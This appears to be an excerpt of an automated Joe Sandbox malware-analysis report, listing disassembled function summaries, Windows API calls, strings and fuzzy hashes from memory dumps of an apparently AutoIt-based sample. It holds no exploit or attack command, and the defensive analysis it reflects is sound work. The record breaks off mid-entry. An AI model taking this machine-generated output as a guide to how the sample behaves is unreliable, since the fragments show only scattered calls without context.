                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: ba0983aaad95501972e4cb15f4a8895a3699f75d25aa5b626a2344c45de8e121
                                                        • Instruction ID: 30f9e544ec6ab0a27e332eb5ccea24a52fcc73f3ad6e8f6d7c18cd2bc0fe99c1
                                                        • Opcode Fuzzy Hash: ba0983aaad95501972e4cb15f4a8895a3699f75d25aa5b626a2344c45de8e121
                                                        • Instruction Fuzzy Hash: 18E0BF36108005BFCB012B96DC08C59FBA6FF883213108231F62591571CB33A476EB51
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 50b76fb0316add1051eb1877be0062c4790701e36524536d662e702fc88bbe64
                                                        • Instruction ID: 0f81bbd6152131a100390b5a579d8a7549480c2e70a52dd9980c6685ca9d8b85
                                                        • Opcode Fuzzy Hash: 50b76fb0316add1051eb1877be0062c4790701e36524536d662e702fc88bbe64
                                                        • Instruction Fuzzy Hash: 58E04FB1104204EFDB005F71CC48AAE7BA5EB4C355F11D839FD5AA7211CBB69846DB40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 4872d1b2ca204799001179374802c2026e4a1ef756748fcad6fd9e1287db8363
                                                        • Instruction ID: fb700dc1957342f35765ce9353e025252556815feb9270b7a1ff27a1f85f7028
                                                        • Opcode Fuzzy Hash: 4872d1b2ca204799001179374802c2026e4a1ef756748fcad6fd9e1287db8363
                                                        • Instruction Fuzzy Hash: 0EE04FB1504204EFDB005F71CC48A6D7BA5EB4C355F118839FD5AA7211CB779846CB00
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00E7DEAA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 3565006973-3941886329
                                                        • Opcode ID: ad3979ed2c6cc954b385e7c2bfda554457c780d7ca14d50cc077eb15a8c8d911
                                                        • Instruction ID: c8d7771e7989fed44f23de7d89dcf80a27cc80cfb672e05ab44f7c66c7bb4ac5
                                                        • Opcode Fuzzy Hash: ad3979ed2c6cc954b385e7c2bfda554457c780d7ca14d50cc077eb15a8c8d911
                                                        • Instruction Fuzzy Hash: AA913670604701AFDB24CF64C884B6AB7F9FF48714B14956EF94AEB291DB71E841CB60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy
                                                        • String ID: I/$I/
                                                        • API String ID: 3048848545-2526233121
                                                        • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                        • Instruction ID: a7bc37aede15cab0ff7756e5478647185c0257502ee87213ce0fb1f87ac52fdf
                                                        • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                        • Instruction Fuzzy Hash: D0419235900216AACF29FF98D4419FDB7B0EF48714F54609EEA8DB7191EB309E82C760
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00E5BCDA
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00E5BCF3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: e2d4bef64b7d48c2a42bf2a4a38098428e10aee07672f06aa76d98b154629fb0
                                                        • Instruction ID: 5f452d67d1169e2922727527f09d245153e53f51c98609661cc58e56620615fa
                                                        • Opcode Fuzzy Hash: e2d4bef64b7d48c2a42bf2a4a38098428e10aee07672f06aa76d98b154629fb0
                                                        • Instruction Fuzzy Hash: 9F515371408B449BE320AF10D886BAFBBE8FBD5355F414C5EF6C8A11A2DB3084ACC756
                                                        APIs
                                                          • Part of subcall function 00E444ED: __fread_nolock.LIBCMT ref: 00E4450B
                                                        • _wcscmp.LIBCMT ref: 00E8C65D
                                                        • _wcscmp.LIBCMT ref: 00E8C670
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: e82dadacaedf19d0dadfebf7caef8c728a4fc88696abb4f8b225bc22cd22d053
                                                        • Instruction ID: 6522ce6c1b0638cfa28d5c329409b1a1b9d69442a941da7f6d756d97bfbc9796
                                                        • Opcode Fuzzy Hash: e82dadacaedf19d0dadfebf7caef8c728a4fc88696abb4f8b225bc22cd22d053
                                                        • Instruction Fuzzy Hash: 9B41E372B0020ABADF21AAA49C41FEF77F9EF49704F101079F619FB181D671AA048B60
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00EAA85A
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EAA86F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: 6727b797f11d64568f98eaf7622ca7e058482c33211366fdd646df7a7b10249c
                                                        • Instruction ID: ce0afcfef638e75ab6015b9f6aad7b59a4a1ee760028da14e07d062526095870
                                                        • Opcode Fuzzy Hash: 6727b797f11d64568f98eaf7622ca7e058482c33211366fdd646df7a7b10249c
                                                        • Instruction Fuzzy Hash: A7410675A013099FDB54CF68C884BEA7BB9FF09304F14107AE905AB381D775A946CFA1
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00EA980E
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EA984A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: d6872e905338d8014f0b91bd4ea81ec6173590783fada1ba5b378f16b16b0713
                                                        • Instruction ID: 68c19c09b340c48b318aac77dfca65602bb0463ce0a4269a0a57b6dfbfadc8e4
                                                        • Opcode Fuzzy Hash: d6872e905338d8014f0b91bd4ea81ec6173590783fada1ba5b378f16b16b0713
                                                        • Instruction Fuzzy Hash: FC31B071100204AEDB149F34CC80BFB77A9FF5E764F109619F9A9EB151CA35AC81C760
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E851C6
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E85201
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 6c3c9ff0d66cdbb5e6c5d1d139218499e5817a19b9be611afc5911bff52ba608
                                                        • Instruction ID: 81ebaa061b93fb1ea2ced45efa7e25ef8acf85ce51fd21d38322f12767fef896
                                                        • Opcode Fuzzy Hash: 6c3c9ff0d66cdbb5e6c5d1d139218499e5817a19b9be611afc5911bff52ba608
                                                        • Instruction Fuzzy Hash: ED31E132600704EBEB24EF99D845BAEBBF5BF45394F141029E98DB61B0EF709A44CB10
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __snwprintf
                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                        • API String ID: 2391506597-2584243854
                                                        • Opcode ID: dd0a5d65e46b6912001fc60a73c2ed666843e7e0624a37024db8332957a9b8e4
                                                        • Instruction ID: 45f44a2fc39d93e04742f6a6a7a125a73b1d4e3f9c5eeae1323c49f8f022b8b9
                                                        • Opcode Fuzzy Hash: dd0a5d65e46b6912001fc60a73c2ed666843e7e0624a37024db8332957a9b8e4
                                                        • Instruction Fuzzy Hash: 9A216F71A00218ABCF10EFA4D882EED77F4AF45740F10649AF505BB292DB70EA45CBA1
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EA945C
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EA9467
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 11cf07c0a6aa4effd35fb681495335b545256e52e9b5bcedabc24c2f63c1d83d
                                                        • Instruction ID: 68b754d0ba3316be0104bea08710b63c94625773b4df17cd4d734b0c62876f4a
                                                        • Opcode Fuzzy Hash: 11cf07c0a6aa4effd35fb681495335b545256e52e9b5bcedabc24c2f63c1d83d
                                                        • Instruction Fuzzy Hash: D811B6713006086FEF119F54DCC0EBB37AEEB4D3A8F101125F925AB291D631AC528760
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                        • GetActiveWindow.USER32 ref: 00EADA7B
                                                        • EnumChildWindows.USER32(?,00EAD75F,00000000), ref: 00EADAF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$ActiveChildEnumLongWindows
                                                        • String ID: T1
                                                        • API String ID: 3814560230-924183305
                                                        • Opcode ID: 53b0063ba95a4125332ac1d43c5d0f097b5d425ec8bc309c95b2c104cc547525
                                                        • Instruction ID: 7a159e5baefe50f2475427965e14727b69ab2ed76d61892b49580cf22fa5a5fc
                                                        • Opcode Fuzzy Hash: 53b0063ba95a4125332ac1d43c5d0f097b5d425ec8bc309c95b2c104cc547525
                                                        • Instruction Fuzzy Hash: 27211B75208205DFC714DF28DC50AA677E5FB5A320F251619F96A9B3E0DB31B801DB60
                                                        APIs
                                                          • Part of subcall function 00E5D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E5D1BA
                                                          • Part of subcall function 00E5D17C: GetStockObject.GDI32(00000011), ref: 00E5D1CE
                                                          • Part of subcall function 00E5D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E5D1D8
                                                        • GetWindowRect.USER32(00000000,?), ref: 00EA9968
                                                        • GetSysColor.USER32(00000012), ref: 00EA9982
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: f0da5cb7b6d8a4a29265a7fd0a2c298c09ae6812e0c890de07f63f7933f97196
                                                        • Instruction ID: 1a81654d813f7ac348df3b13d58a2d1998064e90e852a0f66ddf658040bfb413
                                                        • Opcode Fuzzy Hash: f0da5cb7b6d8a4a29265a7fd0a2c298c09ae6812e0c890de07f63f7933f97196
                                                        • Instruction Fuzzy Hash: D4118672520209AFDB04DFB8CC45EEA7BA8FB4D308F011628F956E2250E735E810DB60
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00EA9699
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EA96A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: d989408ac2b32bbd5a1408558095166a51b2ed12a203fd432a957fae52715590
                                                        • Instruction ID: 9186223e822bc62834ad3698cca8f54b4a09faf6c48284e7802ca3a677226516
                                                        • Opcode Fuzzy Hash: d989408ac2b32bbd5a1408558095166a51b2ed12a203fd432a957fae52715590
                                                        • Instruction Fuzzy Hash: D3118C71500208AFEB105F64DC44EEB3B6AEF8A378F106724F965AB1E1C736EC5197A0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E852D5
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E852F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: aa193b5cea6eab8e057fc7d18f80a6db8ec426bebbd29d2b36cd0c2f46dacfb3
                                                        • Instruction ID: 713e79997041fb3579032980b6a9c0f5a0702e5cf9bcd9f6e0cfd99f0188d3ae
                                                        • Opcode Fuzzy Hash: aa193b5cea6eab8e057fc7d18f80a6db8ec426bebbd29d2b36cd0c2f46dacfb3
                                                        • Instruction Fuzzy Hash: C311DD73901714EBDB21EB98DD44B9977F8AB05798F041025E90DF72A4DBB0AE04DBA1
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E94DF5
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E94E1E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: ea5f3d3862f99b50f24c1d97cedfa1f0dca5a4f5d16135a5b625e4886bd83490
                                                        • Instruction ID: 559042db182bf3478f939f606ec69e1034efdce2f24754e59116aee538342b23
                                                        • Opcode Fuzzy Hash: ea5f3d3862f99b50f24c1d97cedfa1f0dca5a4f5d16135a5b625e4886bd83490
                                                        • Instruction Fuzzy Hash: 3311A0B5501221BBDF258F62CC88EFBFBA8FF06759F10922AF505A6180D3705986C6E0
                                                        APIs
                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00E9A84E
                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00E9A88B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: htonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 3832099526-2422070025
                                                        • Opcode ID: d4eec8f6ae9faba16378c4deafd705aad19ed59906d0160e4b32f97d9117ea6f
                                                        • Instruction ID: 1186255d21ba10af04383fc7ec68d22e039720a337251f6ba278617c00cd4bba
                                                        • Opcode Fuzzy Hash: d4eec8f6ae9faba16378c4deafd705aad19ed59906d0160e4b32f97d9117ea6f
                                                        • Instruction Fuzzy Hash: C801D675200304ABCB349F64D84AFA9B3A8EF45314F24943AF515B73D1D772E8068792
                                                        APIs
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E7B7EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 3850602802-1403004172
                                                        • Opcode ID: 302e5e3a5edb5bc4e6c4dddf34482f7e354164f844f20eaf3b95a276ddee54af
                                                        • Instruction ID: 511517b8532e99dbe83d232bfe4aec08230ef30f1bd2c94c07fe64ab479e4860
                                                        • Opcode Fuzzy Hash: 302e5e3a5edb5bc4e6c4dddf34482f7e354164f844f20eaf3b95a276ddee54af
                                                        • Instruction Fuzzy Hash: 1B012471601118ABCB48EBA4DC42EFE33B9BF05310B14561DF566B32D2EF7068088790
                                                        APIs
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E7B6EB
                                                        Strings
                                                        Memory Dump Source
